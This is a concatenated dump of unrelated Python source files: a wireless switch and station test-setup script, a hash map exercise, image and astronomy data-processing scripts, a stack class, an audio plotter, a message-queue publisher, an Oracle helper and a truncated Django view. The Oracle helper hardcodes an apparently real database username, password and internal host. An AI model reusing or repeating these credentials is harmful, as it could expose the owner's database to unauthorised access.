address',If_vlan4091_s1_ipv6+'/64')\n EnterInterfaceMode(switch3,'vlan '+Vlan4092)\n IdleAfter(Vlan_Idle_time)\n SetCmd(switch3,'ip address',If_vlan4092_s1_ipv4,'255.255.255.0')\n \n #开启DHCP\n EnterConfigMode(switch3)\n SetCmd(switch3,'service dhcp')\n SetCmd(switch3,'ip dhcp excluded-address',If_vlan4091_s1_ipv4)\n SetCmd(switch3,'ip dhcp excluded-address',If_vlan4092_s1_ipv4)\n SetCmd(switch3,'ip dhcp excluded-address',updateserver)\n SetCmd(switch3,'ip dhcp excluded-address',If_vlan1_s3_ipv4)\n SetCmd(switch3,'ip dhcp excluded-address',If_vlan1_s1_ipv4)\n SetCmd(switch3,'ip dhcp pool vlan4091')\n SetCmd(switch3,'network',Dhcp_pool1 + '2 24')\n SetCmd(switch3,'default-router',If_vlan4091_s1_ipv4)\n SetCmd(switch3,'exit')\n SetCmd(switch3,'ip dhcp pool vlan4092')\n SetCmd(switch3,'network',Dhcp_pool2 + '2 24')\n SetCmd(switch3,'default-router',If_vlan4092_s1_ipv4)\n SetCmd(switch3,'exit')\n SetCmd(switch3,'ip dhcp pool vlan'+Vlan1)\n SetCmd(switch3,'network',If_vlan1_s3_ipv4,'26')\n SetCmd(switch3,'default-router',If_vlan1_s3_ipv4)\n SetCmd(switch3,'exit')\n \n EnterConfigMode(switch3)\n for i in range(total_apnum):\n SetCmd(switch3,'interface',ap_s3port_list[i])\n SetCmd(switch3,'switchport mode trunk')\n SetCmd(switch3,'switchport trunk native vlan '+Vlan1)\n\n#----------------------- PC1,STA1,STA2 配置实验网路由,保持控制连接-------------------------------\n# 配置PC1默认网关\nSetCmd(pc1,'route add -net default gw',If_vlan192_s3_ipv4)\n#----------------------- 初始化STA1,STA2,开启wpa_supplicant-------------------------------\nSetCmd(sta1,'ifconfig ' + Netcard_sta1 + ' up')\nSetCmd(sta1,'rm -rf /tmp/capture/*.cap')\nSetCmd(sta1,'rm -rf /tmp/wpa_log/*.log')\nSetCmd(sta1,'rm -rf /root/nohup.out')\n#开启sta1,sta2的wpa_supplicant\nSetCmd(sta1,'ifconfig %s up' % Netcard_sta1)\nIdleAfter(2)\ndata = SetCmd(sta1,'iwconfig')\nif CheckLine(data,'%s' % Netcard_sta1)!=0:\n SetCmd(sta1,'rmmod iwldvm')\n SetCmd(sta1,'rmmod iwlwifi')\n IdleAfter(5)\n SetCmd(sta1,'modprobe iwlwifi')\n#data = SetCmd(sta1,'ifconfig mon0')\nif CheckLine(data,'mon0')!=0:\n SetCmd(sta1,'airmon-ng start ' + Netcard_sta1)\nIdleAfter(2)\t\nSetCmd(sta1,'pkill -9 wpa_supplicant')\nIdleAfter(3)\nSetCmd(sta1,'wpa_supplicant -B -i '+ Netcard_sta1 +' -c /etc/wpa_supplicant/wpa_supplicant.conf -f /tmp/wpa_log/%s.log' % Netcard_sta1)\n\nSetCmd(sta2,'ifconfig ' + Netcard_sta2 + ' up')\nSetCmd(sta2,'rm -rf /tmp/capture/*.cap')\nSetCmd(sta2,'rm -rf /tmp/wpa_log/*.log')\nSetCmd(sta2,'rm -rf /root/nohup.out')\nSetCmd(sta2,'ifconfig %s up' % Netcard_sta2)\nIdleAfter(2)\ndata = SetCmd(sta2,'iwconfig')\nif CheckLine(data,'%s' % Netcard_sta2)!=0:\n SetCmd(sta2,'rmmod iwldvm')\n SetCmd(sta2,'rmmod iwlwifi')\n IdleAfter(5)\n SetCmd(sta2,'modprobe iwlwifi')\n#data = SetCmd(sta2,'ifconfig mon0')\nif CheckLine(data,'mon0')!=0:\n SetCmd(sta2,'airmon-ng start ' + Netcard_sta2)\nIdleAfter(2)\nSetCmd(sta2,'pkill -9 wpa_supplicant')\nIdleAfter(3)\nSetCmd(sta2,'wpa_supplicant -B -i '+ Netcard_sta2 +' -c /etc/wpa_supplicant/wpa_supplicant.conf -f /tmp/wpa_log/%s.log' % Netcard_sta2)\n\n######################## 保存各交换机配置 ###################\nEnterEnableMode(switch1)\nSetCmd(switch1,'clock set 09:00:00 2012.12.21')\nIdleAfter('1')\ndata = SetCmd(switch1,'write',timeout=1)\nSetCmd(switch1,'y',timeout=2)\nSetCmd(switch1,'show run')\n\nEnterEnableMode(switch3)\nSetCmd(switch3,'clock set 09:00:00 2012.12.21')\nIdleAfter('1') \nEnterEnableMode(switch3)\ndata = SetCmd(switch3,'write',timeout=1)\nSetCmd(switch3,'y',timeout=2)\nSetCmd(switch3,'show run')\n#检测AC1是否成功管理AP1\nEnterEnableMode(switch1)\n# CheckSutCmd(switch1,'show wireless ap status', \\\n # check=[(ap1mac,'Managed','Success')], \\\n # waittime=5,retry=20,interval=5,IC=True)\n# WirelessApplyProfileWithCheck(switch1,['1'],[ap1mac])\nprofile_list = []\nfor i in range(total_apnum):\n CheckSutCmd(switch1,'show wireless ap status | include ' + ap_mac_list[i], \\\n check=[(ap_mac_list[i],'Managed','Success')], \\\n waittime=2,retry=5,interval=5,IC=True)\n profile_list.append(str(i+1))\nWirelessApplyProfileWithCheck(switch1,profile_list,ap_mac_list)\n \ndata6 = SetCmd(switch1,'show wireless')\nif re.search('CN - China',data6) is None:\n wx.MessageBox('AP not set to country code CN - China')\n\n\nprintInitialTimer('TestCase Initial','End')","sub_path":"autoTests/performance_test/performance_initial_oneap.py","file_name":"performance_initial_oneap.py","file_ext":"py","file_size_in_byte":12629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"8888514","text":"\"\"\"\n不使用任何内建的哈希表库设计一个哈希映射(HashMap)。\n\n实现 MyHashMap 类:\n\nMyHashMap() 用空映射初始化对象\nvoid put(int key, int value) 向 HashMap 插入一个键值对 (key, value) 。如果 key 已经存在于映射中,则更新其对应的值 value 。\nint get(int key) 返回特定的 key 所映射的 value ;如果映射中不包含 key 的映射,返回 -1 。\nvoid remove(key) 如果映射中存在 key 的映射,则移除 key 和它所对应的 value 。\n\"\"\"\n\n\nclass Node:\n def __init__(self, key, val, next_node=None):\n self.key = key\n self.val = val\n self.next_node = next_node\n\n\nclass MyHashMap:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self._capacity = 1000\n self._table = [Node(-1, -1) for i in range(self._capacity)]\n\n def put(self, key: int, value: int) -> None:\n \"\"\"\n value will always be non-negative.\n \"\"\"\n hash_key = self._get_hash(key)\n node = self._get_node(key)\n if not node:\n new_node = Node(key, value)\n head = self._table[hash_key]\n new_node.next_node = head.next_node\n head.next_node = new_node\n else:\n node.val = value\n\n def get(self, key: int) -> int:\n \"\"\"\n Returns the value to which the specified key is mapped, or -1 if this map contains no mapping for the key\n \"\"\"\n node = self._get_node(key)\n return node.val if node else -1\n\n def remove(self, key: int) -> None:\n \"\"\"\n Removes the mapping of the specified value key if this map contains a mapping for the key\n \"\"\"\n hash_key = self._get_hash(key)\n pre = self._table[hash_key]\n cur = pre.next_node\n\n while cur:\n if cur.key == key:\n pre.next_node = cur.next_node\n pre = pre.next_node\n cur = cur.next_node\n\n def _get_node(self, key):\n \"\"\"\n 查找Key对应的Node\n \"\"\"\n hash_key = self._get_hash(key)\n node = self._table[hash_key].next_node\n\n while node:\n if node.key == key:\n return node\n node = node.next_node\n return None\n\n def _get_hash(self, key):\n return key % self._capacity\n","sub_path":"algorithm/LeetCode_706_设计哈希映射.py","file_name":"LeetCode_706_设计哈希映射.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"15034670","text":"import os\nimport sys\nimport glob\nfrom PIL import Image\n\nargs = sys.argv\nimagepath = os.path.abspath(args[1])\noutpath = os.path.abspath(args[2])\nimageList = []\n\nif os.path.exists(os.path.abspath(outpath)) == False:\n os.makedirs(os.path.abspath(outpath))\n\nclass Resize:\n def __init__(self, width=256, height=256):\n self.width = width\n self.height = height\n self.picture_size = (self.width, self.height)\n\n def load_imagefile(self):\n extlist = [\"*.jpg\", \"*.jpeg\", \"*.JPEG\", \"*.jpe\"]\n for e in extlist:\n filelist = glob.glob(os.path.join(imagepath, e))\n imageList.extend(filelist)\n\n def resize_imagefile(self):\n for img in imageList:\n resized_img = Image.open(img)\n image = resized_img.resize(self.picture_size)\n basename = os.path.basename(img)\n name, ext = os.path.splitext(basename)\n \n if ext is not \".JPEG\":\n ext = \".JPEG\"\n\n imgname = name + ext\n image.save(os.path.join(outpath, imgname))\n\n\nif __name__=='__main__':\n resize = Resize(416, 416)\n resize.load_imagefile()\n resize.resize_imagefile()\n","sub_path":"resize_convert/resize_rename.py","file_name":"resize_rename.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"311809465","text":"#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#--------------------------IMPORTS----------------------------------\n\nimport os\nimport glob\nimport drizzlepac\n\nfrom acstools import acs_destripe_plus\nfrom astropy.io import fits\nfrom drizzlepac import astrodrizzle\nfrom drizzlepac import updatenpol\nfrom stwcs import updatewcs\n\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#--------------------PRELIMINARY INPUTS-----------------------------\n\n\ninput_dir = raw_input('What is the directory where the raw data is stored?')\noutput_dir = raw_input('What is the desired output directory?')\n\nmaindir = \"/Users/jshanahan/Research/\" + input_dir + '/'\noutdir = \"/Users/jshanahan/Research/\" + output_dir + '/'\ndir_list = glob.glob(maindir+\"target???\")\n\nos.environ[\"jref\"] = \"/Users/jshanahan/Research/crds_cache/references/hst/acs/\"\nos.environ[\"CRDS_PATH\"]=\"/Users/jshanahan/Research/crds_cache\"\nos.environ[\"CRDS_SERVER_URL\"]=\"https://hst-crds.stsci.edu\"\n\nrun_dirorg = raw_input('Do the directories need to be organized by exposure time?').lower()\nif run_dirorg == 'yes':\n\tfor directory in dir_list:\n\t\tkey = os.path.basename(directory)\n\t\tfor f in glob.glob(directory + '/' +'*raw.fits'):\n\t\t\ttry:\n\t\t\t\twith fits.open(f, ignore_missing_end=True, mode='update') as hdu:\n\t\t\t\t\texptime = hdu[0].header['EXPTIME']\n\t\t\t\t\tif exptime <= 30.0:\n\t\t\t\t\t\ttry: \n\t\t\t\t\t\t\tos.mkdir(directory + '/shortexp')\n\t\t\t\t\t\texcept OSError:\n\t\t\t\t\t\t\tprint('Short exposure directory already exists for', key)\n\t\t\t\t\t\tos.rename(f,directory + '/shortexp/' + os.path.basename(f))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tos.mkdir(directory + '/longexp')\n\t\t\t\t\t\texcept OSError:\n\t\t\t\t\t\t\tprint('Long exposure directory already exists for', key)\t\n\t\t\t\t\t\tos.rename(f,directory + '/longexp/' + os.path.basename(f))\n\t\t\texcept IOError:\n\t\t\t\tprint('An error occurred trying to read ', f)\n\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#----------------------UPDATE HEADERS-------------------------------\n\n\nrun_headercorr = raw_input('Update headers for CTE correction?').lower()\nif run_headercorr == 'yes':\n\tfor directory in dir_list:\n\t\tshort_dir = directory + '/shortexp/'\n\t\tlong_dir = directory + '/longexp/'\n\t\tshortexp_raw = glob.glob(short_dir + '*raw.fits')\n\t\tlongexp_raw = glob.glob(long_dir + '*raw.fits')\n\t\tfor file in shortexp_raw:\n\t\t\twith fits.open(file, mode='update') as hdu: \n\t\t\t\thdu[0].header['PCTECORR'] = 'PERFORM'\n\t\tfor file in longexp_raw:\n\t\t\twith fits.open(file, mode='update') as hdu: \n\t\t\t\thdu[0].header['PCTECORR'] = 'PERFORM'\n\t\tprint('Headers updated for:',directory)\nelse:\n\tprint('Headers were not updated.')\n\nrun_crds = raw_input('Run CRDS?').lower()\nif run_crds == 'yes':\n\tcommand = 'crds bestrefs --update-bestrefs --sync-references=1 --files ' + maindir + 'target???/*/*raw.fits'\n\tos.system(command)\nelse:\n\tprint('CRDS not run.')\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-----------------CTE CORRECTION & DESTRIPING-----------------------\n\nrun_CTE = raw_input('Run the CTE correction and destriping?').lower()\nif run_CTE == 'yes':\n\tfor directory in dir_list:\n\t\tshort_dir = directory + '/shortexp/'\n\t\tlong_dir = directory + '/longexp/'\n\t\tshortfiles = glob.glob(short_dir + '*raw.fits')\n\t\tlongfiles = glob.glob(long_dir + '*raw.fits')\n\t\ttest_short = glob.glob(short_dir + '*.fits')\n\t\ttest_long = glob.glob(long_dir + '*.fits')\n\t\tif len(test_short) > 4.0:\n\t\t\tprint(\"Destriping already done.\")\n\t\telse:\n\t\t\tacs_destripe_plus.destripe_plus(shortfiles, cte_correct=True, verbose=True)\n\t\tif len(test_long) > 4.0:\n\t\t\tprint(\"Destriping already done.\")\n\t\telse:\n\t\t\tacs_destripe_plus.destripe_plus(longfiles, cte_correct=True, verbose=True)\n\t\tprint(\"Destriping complete for\", os.path.basename(directory))\nif run_CTE == 'no':\n\tprint(\"CTE correction and destriping skipped.\")\n\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-----------------------UPDATING IMAGES-----------------------------\n\nrun_update = raw_input('Update files?').lower()\nif run_update == 'yes':\n\tfiles = maindir + '/target???/*/*flc.fits'\n\tupdatewcs.updatewcs(files)\n\tupdatenpol.update(files, 'jref$')\nif run_update == 'no':\n\tprint(\"Files were not updated.\")\n\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#--------------------------DRIZZLING--------------------------------\n\nrun_drizzle = raw_input('Drizzle files?').lower()\nif run_drizzle == 'yes':\n\tfor directory in dir_list:\n\t\ttarget = os.path.basename(directory)\n\t\tshort_dir = directory + '/shortexp/'\n\t\tshort_out_dir = outdir + target + '/' + 'shortexp/'\n\t\ttry:\n\t\t\tos.mkdir(short_out_dir)\n\t\texcept OSError:\n\t\t\tprint('Short exposure directory already exists in the output directory.')\n\t\toutput = short_out_dir + target + '_shortexp_FINAL'\n\t\tfiles = glob.glob(short_dir + '*flc.fits')\n\t\tastrodrizzle.AstroDrizzle(files, output = output, clean='Yes', skywidth=0.10000000149, skystat='mode', skylower= -100.0, driz_sep_pixfrac=0.7, driz_sep_bits='256,64,32', combine_nhigh=1, driz_cr_corr='yes', driz_cr_snr='3.0 3.0', driz_cr_grow=2, driz_cr_scale='1.0 0.7',final_wht_type = 'EXP', final_kernel='gaussian', final_pixfrac=0.8, final_bits='256,64,32', final_wcs='yes', final_scale=0.0333, gnkeyword='ATODGNA,ATODGNB,ATODGNC,ATODGND', rnkeyword='READNSEA,READNSEB,READNSEC,READNSED', expkeyword='EXPTIME')\n\t\tprint(\"Drizzling complete for short exposures in\", os.path.basename(directory))\n\n\tfor directory in dir_list:\n\t\ttarget = os.path.basename(directory)\n\t\tlong_dir = directory + '/longexp/'\n\t\tlong_out_dir = outdir + target + '/' + 'longexp/'\n\t\ttry:\n\t\t\tos.mkdir(long_dir)\n\t\texcept OSError:\n\t\t\tprint('Long exposure directory already exists in the output directory.')\n\t\toutput = long_out_dir + target +'_longexp_FINAL'\n\t\tfiles = glob.glob(long_dir + '*flc.fits')\n\t\tastrodrizzle.AstroDrizzle(files, output = output, clean='Yes', skywidth=0.10000000149, skystat='mode', skylower= -100.0, driz_sep_pixfrac=0.7, driz_sep_bits='256,64,32', combine_nhigh=1, driz_cr_corr='yes', driz_cr_snr='3.0 3.0', driz_cr_grow=2, driz_cr_scale='1.0 0.7',final_wht_type = 'EXP',final_kernel='gaussian', final_pixfrac=0.8, final_bits='256,64,32', final_wcs='yes', final_scale=0.0333, gnkeyword='ATODGNA,ATODGNB,ATODGNC,ATODGND', rnkeyword='READNSEA,READNSEB,READNSEC,READNSED', expkeyword='EXPTIME')\n\t\tprint(\"Drizzling complete for long exposures in\", os.path.basename(directory))\nif run_drizzle == 'no':\n\tprint(\"Drizzling skipped.\")\n","sub_path":"data_reduction.py","file_name":"data_reduction.py","file_ext":"py","file_size_in_byte":7234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"551208851","text":"#######################################\n# Data Structures and Problem Solving #\n# Implementing a Stack in Python\t #\n#\t\t\t\t\t\t\t\t\t #\n# @Author: Michiel Quintelier\t\t #\n# @Date: 17/11/2013 (dd/mm/yyyy)\t #\n# @University of Antwerp\t\t\t #\n#######################################\n\n## Array-Based Implementation ##\n\n\nclass Stack():\n\t'''Class representation of the ADT Stack'''\n\n\n\tdef __init__(self, size):\n\t\t'''Constructor'''\n\n\t\tself.stack = []\n\t\tfor i in range(size):\t\t\t# default constuction of a stack has 'size' None items\n\t\t\tself.stack.append(None)\n\n\t\tself.size = size\n\t\tself.top = None\t\t\t\t\t# top represents the index of the top item, None if empty\n\n\n\tdef __str__(self):\n\t\t'''Print overloading'''\n\n\t\tprintstring = '['\t\t\t\t\t\t\t\t\t# construct string type to be printed\n\t\tcounter = 1\n\t\tfor i in range(self.size):\n\t\t\tif counter == self.size:\t\t\t\t\t\t# special case last item\n\t\t\t\tprintstring += str(self.stack[i]) + ']'\n\t\t\telse:\n\t\t\t\tprintstring += str(self.stack[i]) + ', '\t# regular case normal item\n\t\t\t\tcounter += 1\n\n\t\treturn printstring\t\t\t\t\t\t\t\t\t# need of own constructed string because self.stack isn't a string\n\n\n\tdef isEmpty(self):\n\t\t'''Determines whether stack is empty'''\n\n\t\tif self.top == None:\t\t# if top is None, it means no items have been added yet\n\t\t\treturn True\n\t\telse:\t\t\t\t\t\t# if top is not of the Nonetype, it means items are present\n\t\t\treturn False\n\n\n\tdef push(self, newItem):\n\t\t'''Adds an item to the stack'''\n\n\t\ttry:\n\t\t\tif self.top == None:\t\t\t\t\t\t\t# for first item, top needs to be adjusted to an integer\n\t\t\t\tself.top = 0\n\t\t\t\tself.stack[self.top] = newItem\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tself.stack[self.top + 1] = newItem \t\t\t# try at top + 1 index, because that's where the exception could occur\n\t\t\t\tself.top += 1 \t\t\t\t\t\t\t\t# only increment after exception check, else top gets changed unwanted\n\t\t\t\treturn True\n\n\t\texcept:\n\t\t\tprint(\"Item was not added because the Stack is full.\")\n\t\t\treturn False\n\n\n\tdef pop(self):\n\t\t'''Removes the top of the stack'''\n\n\t\tif self.top == 0:\t\t\t\t\t\t\t# only one element --> top back to None\n\t\t\tself.stack[0] = None\n\t\t\tself.top = None\n\t\t\treturn True\n\n\t\telif self.top == None:\t\t\t\t\t\t# cannot delete from empty stack\n\t\t\tprint(\"The stack is already empty\")\n\t\t\treturn False\n\n\t\telse:\n\t\t\tself.stack[self.top] = None \t\t\t# set back to None state\n\t\t\tself.top -= 1\n\t\t\treturn True\n\n\n\n\t#### YES OR NO? ####\n\tdef retrievePop(self):\n\t\t'''Function to retrieve and delete the top of the stack'''\n\n\t\tpass\n\n\t\t'''This is basically a concatenation of the functions getTop and pop'''\n\t#### YES OR NO? ####\n\n\n\n\tdef getTop(self):\n\t\t'''Retrieves the top of the stack'''\n\n\t\tif self.top == None:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn self.stack[self.top]\n\n\n\tdef destroyStack(self):\n\t\t'''Destroys the stack'''\n\n\t\tdel self\n\n\n#TESTS\n'''\nnew = Stack(3)\nprint(new)\nnew.push(5)\nprint(new)\nnew.push(8)\nprint(new)\nnew.push(6)\nprint(new)\nnew.push('x')\nprint(new)\nnew.pop()\nprint(new)\nnew.pop()\nprint(new)\nnew.push('a')\nprint(new)\nprint(\"TOP: \", new.getTop())\nnew.push('b')\nprint(new)\nnew.pop()\nprint(new)\nnew.push('c')\nprint(new)\nnew.pop()\nprint(new)\nnew.push('d')\nprint(new)\nprint(\"TOP: \", new.getTop())\nnew.pop()\nprint(new)\nnew.pop()\nprint(new)\nnew.pop()\nprint(new)\nnew.pop()\nprint(new)\nnew.destroyStack()\nprint(new)\nprint(new)\n'''\n","sub_path":"Opdr1 + Opdr2 + Opdr3/Opdr1-Michiel/stackAB.py","file_name":"stackAB.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"2840872","text":"from game.item import Item\r\n\r\n\r\nclass LeatherBoots(Item):\r\n def __init__(self):\r\n super().__init__()\r\n self.name = 'Leather Boots'\r\n self.slot = 6\r\n self.type = 'Boots'\r\n self.slot_name = 'feet'\r\n self.defense = {'physical': 1}\r\n self.price = 10\r\n self.require = {'level': 1}\r\n\r\n\r\nleather_boots = LeatherBoots()\r\n","sub_path":"rpg/game/data/item/item_list/boots/leather_boots.py","file_name":"leather_boots.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"553828915","text":"import PyQt5\nfrom PyQt5 import QtGui, QtCore\nimport pyqtgraph as pg\n\n\nimport numpy as np\r\nimport pyaudio\r\nfrom queue import Queue\nimport struct\r\nfrom collections import deque\r\n\r\nq = Queue()\n\nWIDTH = 2\nCHANNELS = 1\nRATE = 16000\nCHUNK = 128\n\nclass Recorder():\n\n def __init__(self, q):\n # print('{} was called'.format(sys._getframe().f_code.co_name))\n self.p = pyaudio.PyAudio()\n self.q = q\n\n def open(self):\n self.stream = self.p.open(\n format=self.p.get_format_from_width(WIDTH),\n channels=CHANNELS,\n rate=RATE,\n input=True,\n input_device_index=0,\n output=False,\n output_device_index=1,\n frames_per_buffer=CHUNK,\n start=True,\n stream_callback=self._callback())\n\n\n\n def close(self):\n # print('{} was called'.format(sys._getframe().f_code.co_name))\n self.stream.stop_stream()\n self.stream.close()\n self.p.terminate()\n\n def _callback(self):\n def callback(in_data, frame_count, time_info, status):\n self.q.put(in_data)\n return (in_data, pyaudio.paContinue)\n\n return callback\n\n\n#-----\nwin = pg.GraphicsWindow(title=\"AudioVisualizer\")\r\np1 = win.addPlot(title=\"Left\")\r\nwin.nextRow()\r\np3 = win.addPlot(title=\"Left\")\r\n\r\ncurve1 = p1.plot(pen='y')\r\ncurve3 = p3.plot(pen='y')\r\np1.setYRange(- 10000,10000)\r\np3.setLogMode(x=False)\r\np3.setYRange(-0,160)\r\nplot_data = deque()\r\n\r\ndeq_max = 4\r\nmax_q=4\r\nw = np.hanning(CHUNK*max_q*deq_max)\r\n\r\nfor i in range(deq_max):\r\n plot_data.append(np.zeros(CHUNK*max_q))\r\n\r\ndef update():\r\n data = []\r\n for i in range(max_q):\r\n data += struct.unpack('h'*CHUNK*CHANNELS, q.get())\r\n\r\n plot_data.append(data)\r\n if len(plot_data) > deq_max:\r\n plot_data.popleft()\r\n\r\n data=np.reshape([plot_data[i] for i in range(deq_max)], (CHUNK*max_q*deq_max, 1))\r\n curve1.setData(data[::2, 0])\r\n\r\n data_=data[:,0]*w\r\n data_fft=np.fft.fft(data_)\r\n curve3.setData(20*np.log10(np.abs(data_fft[:len(data_fft)/2:2])+100))\r\n\r\n\r\ntimer = QtCore.QTimer()\r\ntimer.timeout.connect(update)\r\ntimer.start(1)\r\n\r\n## Start Qt event loop unless running in interactive mode or using pyside.\r\nif __name__ == '__main__':\r\n import sys\r\n recorder = Recorder(q)\r\n recorder.open()\r\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\r\n QtGui.QApplication.instance().exec_()\r\n recorder.close()\r\n","sub_path":"Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"611006600","text":"\"\"\"\nPURPOSE : Dataset preprocess\nHowever, it is useless now since we used DataImageGenerator and function: flow from directory\n\"\"\"\nimport glob\nimport pandas as pd\n\ncsv1Path = 'prep_images_rotated.csv'\ncsv2Path = 'result.csv'\n\ninputfile = \"*.csv\"\noutputfile = \"dog_training.csv\"\ncsv_list = glob.glob(inputfile)\n\nfilepath = csv_list[0]\ndf = pd.read_csv(filepath)\ndf = df.to_csv(outputfile, index=False)\n\nfor i in range(1, len(csv_list)):\n filepath = csv_list[i]\n df = pd.read_csv(filepath)\n df = df.to_csv(outputfile, index=False, header=False, mode='a+')\n","sub_path":"Model/coding/Data_preprocess/read_csv.py","file_name":"read_csv.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"190623451","text":"#!/usr/bin/env python\nimport os\nimport pika\nimport time\nimport asyncio\nfrom aio_pika import connect_robust\nfrom aio_pika.patterns import Master\n\namqp_url = os.environ['AMQP_URL']\n\nasync def main(loop):\n #connection = await connect_robust(\"amqp://guest:guest@127.0.0.1/\")\n connection = await connect_robust(amqp_url, loop=loop)\n print(\"Connected\")\n\n async with connection:\n # Creating channel\n channel = await connection.channel()\n print(\"Got channel\")\n\n master = Master(channel)\n print(\"Got master\")\n\n # Creates tasks by proxy object\n for task_id in range(10):\n await master.proxy.my_task_name(task_id=task_id)\n\n # Or using create_task method\n for task_id in range(10):\n print(\"Starting \",task_id)\n await master.create_task(\n \"my_task_name\", kwargs=dict(task_id=task_id)\n )\n\n while(1):\n time.sleep(1)\n\nif __name__ == \"__main__\":\n time.sleep(15)\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main(loop))\n","sub_path":"demo03/publisher/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"455900528","text":"#coding:utf-8\n\"\"\"\npymysql.Connect()参数说明\nhost(str): MySQL服务器地址\nport(int): MySQL服务器端口号\nuser(str): 用户名\npasswd(str): 密码\ndb(str): 数据库名称\ncharset(str): 连接编码\n\nconnection对象支持的方法\ncursor() 使用该连接创建并返回游标\ncommit() 提交当前事务\nrollback() 回滚当前事务\nclose() 关闭连接\n\ncursor对象支持的方法\nexecute(op) 执行一个数据库的查询命令\nfetchone() 取得结果集的下一行\nfetchmany(size) 获取结果集的下几行\nfetchall() 获取结果集中的所有行\nrowcount() 返回数据条数或影响行数\nclose() 关闭游标对象\n\n\"\"\"\n\nimport cx_Oracle\n\nclass C_oracle():\n # 连接数据库\n def __init__(self):\n user=u'dafy_sales'\n passwd = u'Ju$2017'\n print(cx_Oracle.clientversion())\n host = 'idcdbtest.dafycredit.com'\n #host = \"10.11.11.71\"\n port = 1521\n dbname='testdb'\n #dsn = cx_Oracle.makedsn(host, port, dbname)\n self.conn = cx_Oracle.connect(\"dafy_sales\",\"Ju$2017\",\"idcdbtest.dafycredit.com:1521/DBTEST01\")\n self.cursor = self.conn.cursor()\n\n # 查询数据\n\n def oracle_Search(self, sql):\n self.cursor.execute(sql)\n result = self.cursor.fetchall()\n for row in result:\n print(\"Name:%s\\tSaving:%.2f\" % row)\n print('共查找出', self.cursor.rowcount, '条数据')\n return result\n\n def __del__(self):\n # 关闭连接\n self.cursor.close()\n self.conn.close()\n\n\n\n\n\n\"\"\"\"\n# 获取游标\ncursor = conn.cursor()\n\n\n# 插入数据\nsql = \"INSERT INTO trade (name, account, saving) VALUES ( '%s', '%s', %.2f )\"\ndata = ('雷军', '13512345678', 10000)\ncursor.execute(sql % data)\nconn.commit()\nprint('成功插入', cursor.rowcount, '条数据')\n\n# 修改数据\nsql = \"UPDATE trade SET saving = %.2f WHERE account = '%s' \"\ndata = (8888, '13512345678')\ncursor.execute(sql % data)\nconn.commit()\nprint('成功修改', cursor.rowcount, '条数据')\n\n\n\n# 删除数据\nsql = \"DELETE FROM trade WHERE account = '%s' LIMIT %d\"\ndata = ('13512345678', 1)\ncursor.execute(sql % data)\nconn.commit()\nprint('成功删除', cursor.rowcount, '条数据')\n\n# 事务处理\nsql_1 = \"UPDATE trade SET saving = saving + 1000 WHERE account = '18012345678' \"\nsql_2 = \"UPDATE trade SET expend = expend + 1000 WHERE account = '18012345678' \"\nsql_3 = \"UPDATE trade SET income = income + 2000 WHERE account = '18012345678' \"\n\ntry:\n cursor.execute(sql_1) # 储蓄增加1000\n cursor.execute(sql_2) # 支出增加1000\n cursor.execute(sql_3) # 收入增加2000\nexcept Exception as e:\n conn.rollback() # 事务回滚\n print('事务处理失败', e)\nelse:\n conn.commit() # 事务提交\n print('事务处理成功', cursor.rowcount)\n\"\"\"\n# # 关闭连接\n# cursor.close()\n# conn.close()\n","sub_path":"common/conn_oracle.py","file_name":"conn_oracle.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"356023760","text":"from django.shortcuts import render\nimport re\nimport xlrd\nimport MySQLdb\nimport openpyxl\n\nfrom datetime import date\nimport datetime\n\nfrom .models import EmployeeInfoData\n\ndef emailvalid(emailid):\n # Make a regular expression for validating an Email\n regex = '^\\w+([\\.-]?\\w+)*@\\w+([\\.-]?\\w+)*(\\.\\w{2,3})+$'\n return re.search(regex,emailid)\n\ndef isphoneValid(number): \n \n # 1) Begins with 0 or 91 \n # 2) Then contains 7 or 8 or 9. \n # 3) Then contains 9 digits \n Pattern = re.compile(\"(0/91)?[7-9][0-9]{9}\") \n return Pattern.match(number) \n\ndef calculate_age(born):\n today = date.today()\n return today.year - born.year - ((today.month, today.day) < (born.month, born.day))\n\ndef index(request):\n if \"GET\" == request.method:\n return render(request, 'myapp/index.html', {})\n else:\n if \"upload\" in request.POST:\n excel_file = request.FILES[\"excel_file\"]\n book = xlrd.open_workbook(file_contents=excel_file.read())\n \n sheet = book.sheet_by_index(0)\n # Establish a MySQL connection\n database = MySQLdb.connect 